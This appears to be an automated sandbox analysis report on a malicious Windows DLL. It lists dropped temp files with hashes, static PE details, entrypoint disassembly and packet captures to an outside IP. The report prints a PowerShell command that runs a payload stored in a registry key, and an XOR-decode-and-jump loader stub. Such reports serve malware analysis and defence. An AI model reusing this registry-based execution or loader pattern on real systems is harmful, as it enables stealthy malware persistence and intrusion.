                                                                                                                                      SHA-512:D2461C61C6C837FE436AACC1E5A102D46DC316F96A00DA9554E3B9FF3E3F5D434427A10C6E01F8A063A841E5AF38D2458685FFB8017B413BBF8BC4FDDDF91A4B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.jery0dbp.dll.mme.W32.mscor
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.out
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):412
                                                                                                                                      Entropy (8bit):4.871364761010112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF69EAEE788C6BF5D7.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40233
                                                                                                                                      Entropy (8bit):0.6872617452706091
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:kBqoxKAuqR+uoCLYpl23DlDNwl23DlDNrl23DlDNs:kBqoxKAuqR+uoCLYpw35qw35Vw35W
                                                                                                                                      MD5:A8F2EDC39A71827BE0EBE0795F23702B
                                                                                                                                      SHA1:5CA5DDA74C4A1FA538C7E54A0EB745379DF3FA48
                                                                                                                                      SHA-256:E63BCE665483F60D0B6135DFA320890A758390B6D3ACF556563187FF1CA23455
                                                                                                                                      SHA-512:22EC5CE2106255FAEDD494C61001762E6ACC217E6500F474F62FB0362BFE736B9031722DF1DE4677363870322B14FED15A06892EB1CAB88CFD86AA05A8603ADF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF88E050867DE26AD2.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40153
                                                                                                                                      Entropy (8bit):0.6723538040068409
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+iEOnUVtj58MxzYJJtj58MxzYJatj58MxzYJP:kBqoxKAuqR+iEOnUVtdYJJtdYJatdYJP
                                                                                                                                      MD5:D072772A8EE6BB1D1F40D9F5810CFF5B
                                                                                                                                      SHA1:D59BFDF035410E69B594CE06D30CCA46732FA6CD
                                                                                                                                      SHA-256:3F8E3C2F24061C4B5041DE82829E4B1ECABC0338722626233D521A0CE1FA869D
                                                                                                                                      SHA-512:7C40C58BE6065EB2C39DBB0F7AB6EDF1A6079EDCA96483DB2E64702AD2CAC9AC23769DE290253614EE36BCB5771D3528D94F0AA78DF3AD1512AFB240BD221D36
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9DD6CD76C3034B75.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12933
                                                                                                                                      Entropy (8bit):0.4099601119234265
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9lo5F9lob9lW8pxh2:kBqoIci8pxh2
                                                                                                                                      MD5:E5745EA6BA7E4FCBEBAC1A667C4DF152
                                                                                                                                      SHA1:BC748E222B6BE84EC4F67D6E787E50FBAAFA5E84
                                                                                                                                      SHA-256:F9BBCDB0B367EBB17FF40AFBDD2B55D72775108F9B6E38181AD312A88991CF5D
                                                                                                                                      SHA-512:F4FA6F5A6659E38761731163C2917BF3B1F06D121EE5E324678C11C8D023DB0FD1DE62932858C3C091BF801A550C28BFB410EDA70769BBD3BFE6663E9D022C8F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9E03A6049D0A4DEF.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13269
                                                                                                                                      Entropy (8bit):0.6229294369515466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9lo6F9loW9lWuAWPLmqptFeifFj:kBqoIBHuAMKqptFeifFj
                                                                                                                                      MD5:A36E3BD3176E8121DAF8BB5140F5CD5B
                                                                                                                                      SHA1:D9C2E1221385DFF800CF7AC01C92B6035A39C0A8
                                                                                                                                      SHA-256:5A5217CFCB402B08114E5626D8907C6E824B70AF52052D039DA21FEC0E7F88F7
                                                                                                                                      SHA-512:DBB2AED59AF662AE1B7806F0C42F3ECC1AA7CC34488C405E957FD4516D9BCF24EECBA097A60EDF93FF6D72AB46AF9E969E92797E1D9BBCEA7A1B678064022E6A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFAC17D42899691A13.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40097
                                                                                                                                      Entropy (8bit):0.6605854536521297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+iEOnURYf9isbM8Yf9isbMTYf9isbM8:kBqoxKAuqR+iEOnURYfNbdYfNbiYfNbP
                                                                                                                                      MD5:AC5213F1863C119F6DC3196DBCE0DCA1
                                                                                                                                      SHA1:2D2271EFA95BB84F2D563E7FEBFC833838DA7B5A
                                                                                                                                      SHA-256:781CE28AABCE64773A6A515B04402D7C45EF6F4848CC9609F05B630728654E0E
                                                                                                                                      SHA-512:A90B9854AD45A914A59A186F9E5F14C83564AA1D97BB293F4BE3112FD7632DD8BC9158F578775FFCEC5F1A7C603DB83AFD1BCACF720D81B2BA4DB67315E136D9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFCE3757A75A0E50D1.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40081
                                                                                                                                      Entropy (8bit):0.6597380718430703
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+j9PGN4quk6qioquk6qiXquk6qiQ:kBqoxKAuqR+j9PGN4qSq9qSqqqSqH
                                                                                                                                      MD5:04821721DBA30A21E2778D6D8165C437
                                                                                                                                      SHA1:F18DE01A4E972ABB977A9108572EBB8BBE6E6BBB
                                                                                                                                      SHA-256:5AC06ED84B93E8CA9B61369AC493D891C7CA33133B6672B2C3892E8259E5E9C8
                                                                                                                                      SHA-512:72760C16AFBF3393CBA3D2AAB46CE3D8A2DB2A060B4F5AA5013F2D4AFFED53AA150C36E681B934D0E49AEA123DA61538871D997E3F23872C3C190740042BE00C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\Documents\20201124\PowerShell_transcript.065367.Gk+Yclh6.20201124212019.txt
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1189
                                                                                                                                      Entropy (8bit):5.31795925551072
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:BxSAnLxvBn9zx2DOXUWOLCHGIYBtLWfHjeTKKjX4CIym1ZJX/JPOLCHGIYBtcane:BZFvhJoORF/fqDYB1ZDpFyZZa
                                                                                                                                      MD5:5C19B735B25E4683C49EC53AF83C7ACA
                                                                                                                                      SHA1:05EF721AC886A6BDC1F239F8D80C419B5F09ECAC
                                                                                                                                      SHA-256:172C5E835C804347540CC631E478CF6F6BD8F9A5050332C68D897F73D9A00DA1
                                                                                                                                      SHA-512:429A69B611E2933CF12DC93468E6BDEA393AB75C6B6B9BA40213BEF539BE25E45233462A76F33804161691939E19E046FFB116208D1502EE6801395D5AC9913E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20201124212019..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 065367 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 5556..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201124212019..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**********************..

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.655383585962167
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                      • VXD Driver (31/22) 0.00%
                                                                                                                                      File name:onerous.tar.dll
                                                                                                                                      File size:48128
                                                                                                                                      MD5:79d81979dbbd1c8ceb04cc80a903ecd1
                                                                                                                                      SHA1:f40959018e132fb1430f77a26903af222244676c
                                                                                                                                      SHA256:5dd2f21b81330a342fe1bb9a17a8fde423928e266d4842887f8b41e5d7c2fbd6
                                                                                                                                      SHA512:aeede9ecc3cbfef29ad5a1d3d4b66c245ec48e5c7407f81c7997049ce64009d80f7a97b17b8540ac247211478473ed5f1716e555e91eb64bdc94f632e90d15ec
                                                                                                                                      SSDEEP:768:/JZ7EqWjTpGrg7iSh8NHj4DqVSoqngTeHzD5CHDFuGUJtB:xZ7Eq+T087E4DqVZqngOww7t
                                                                                                                                      File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....o._...........!...I..................... ....@.................................j.....@................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x401000
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE
                                                                                                                                      Time Stamp:0x5FB76FB9 [Fri Nov 20 07:26:49 2020 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:1
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:1
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:1
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:67fdc237b514ec9fab9c4500917eb60f

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                      jne 00007F5E4CAC4271h
                                                                                                                                      call 00007F5E4CAC428Fh
                                                                                                                                      leave
                                                                                                                                      jmp eax
                                                                                                                                      mov eax, 00000001h
                                                                                                                                      jmp 00007F5E4CAC427Eh
                                                                                                                                      cmp dword ptr [ebp+0Ch], 02h
                                                                                                                                      jne 00007F5E4CAC4266h
                                                                                                                                      xor eax, eax
                                                                                                                                      jmp 00007F5E4CAC4274h
                                                                                                                                      cmp dword ptr [ebp+0Ch], 03h
                                                                                                                                      jne 00007F5E4CAC4266h
                                                                                                                                      xor eax, eax
                                                                                                                                      jmp 00007F5E4CAC426Ah
                                                                                                                                      cmp dword ptr [ebp+0Ch], 00000000h
                                                                                                                                      jne 00007F5E4CAC4264h
                                                                                                                                      xor eax, eax
                                                                                                                                      leave
                                                                                                                                      retn 000Ch
                                                                                                                                      push ebx
                                                                                                                                      push edi
                                                                                                                                      push esi
                                                                                                                                      mov ebx, C7618E88h
                                                                                                                                      call 00007F5E4CAC4271h
                                                                                                                                      add ebx, 04h
                                                                                                                                      call 00007F5E4CAC4277h
                                                                                                                                      pop esi
                                                                                                                                      pop edi
                                                                                                                                      pop ebx
                                                                                                                                      ret
                                                                                                                                      xor eax, eax
                                                                                                                                      dec eax
                                                                                                                                      sub ebx, eax
                                                                                                                                      cmp ebx, 07618E84h
                                                                                                                                      jne 00007F5E4CAC4255h
                                                                                                                                      ret
                                                                                                                                      push 00000040h
                                                                                                                                      push 00003000h
                                                                                                                                      push 0000B440h
                                                                                                                                      push 00000000h
                                                                                                                                      call dword ptr [0040D480h]
                                                                                                                                      push ebx
                                                                                                                                      push 0000B440h
                                                                                                                                      push 00402000h
                                                                                                                                      push eax
                                                                                                                                      call 00007F5E4CAC4266h
                                                                                                                                      ret
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      pushad
                                                                                                                                      mov edi, dword ptr [ebp+08h]
                                                                                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                                                                                      mov ecx, dword ptr [ebp+10h]
                                                                                                                                      mov edx, dword ptr [ebp+14h]
                                                                                                                                      lodsb
                                                                                                                                      xor al, dl
                                                                                                                                      stosb
                                                                                                                                      ror edx, 08h
                                                                                                                                      loop 00007F5E4CAC4259h
                                                                                                                                      popad
                                                                                                                                      leave
                                                                                                                                      retn 0010h
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd4400x58.data
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000xa30x200False0.318359375data2.32927408159IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x20000xb4980xb600False0.879035027473data7.7142875486IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0xe0000xc0x200False0.048828125data0.118369631259IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      KERNEL32.DLLVirtualAlloc

                                                                                                                                      Network Behavior

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 24, 2020 21:19:17.779686928 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:17.779814959 CET4973380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:18.051623106 CET804973247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:18.051764011 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:18.053018093 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:18.056646109 CET804973347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:18.056849003 CET4973380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:18.368787050 CET804973247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:19.034208059 CET804973247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:19.041465998 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:19.043437004 CET4973280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:19:19.316349983 CET804973247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:20.001231909 CET4973380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.623794079 CET4975080192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.624310017 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.880029917 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:01.880950928 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.881902933 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:01.885428905 CET804975047.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:01.885560989 CET4975080192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.179645061 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933356047 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933444023 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933485985 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933535099 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933547020 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933577061 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933578968 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933584929 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933589935 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933614016 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933650970 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933689117 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972738981 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972799063 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972841024 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972848892 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972877979 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972877979 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972883940 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972922087 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189378977 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189466000 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189506054 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189546108 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189591885 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189603090 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189634085 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189640999 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189646006 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189671040 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189696074 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189708948 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189733028 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189745903 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189752102 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189783096 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189805984 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189821005 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189831972 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189858913 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189878941 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189924955 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228682041 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228734016 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228764057 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228801012 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228838921 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228854895 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228878021 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228914022 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228918076 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228943110 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228959084 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228991032 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.229039907 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.445724964 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445785046 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445826054 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445866108 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445905924 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445954084 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445981979 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.445997953 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446012974 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446018934 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446022987 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446038008 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446054935 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446078062 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446116924 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446137905 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446146965 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446156979 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446190119 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446197987 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446223021 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446237087 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446258068 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446285963 CET804975147.241.19.44192.168.2.3

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 24, 2020 21:18:57.247888088 CET6349253192.168.2.38.8.8.8
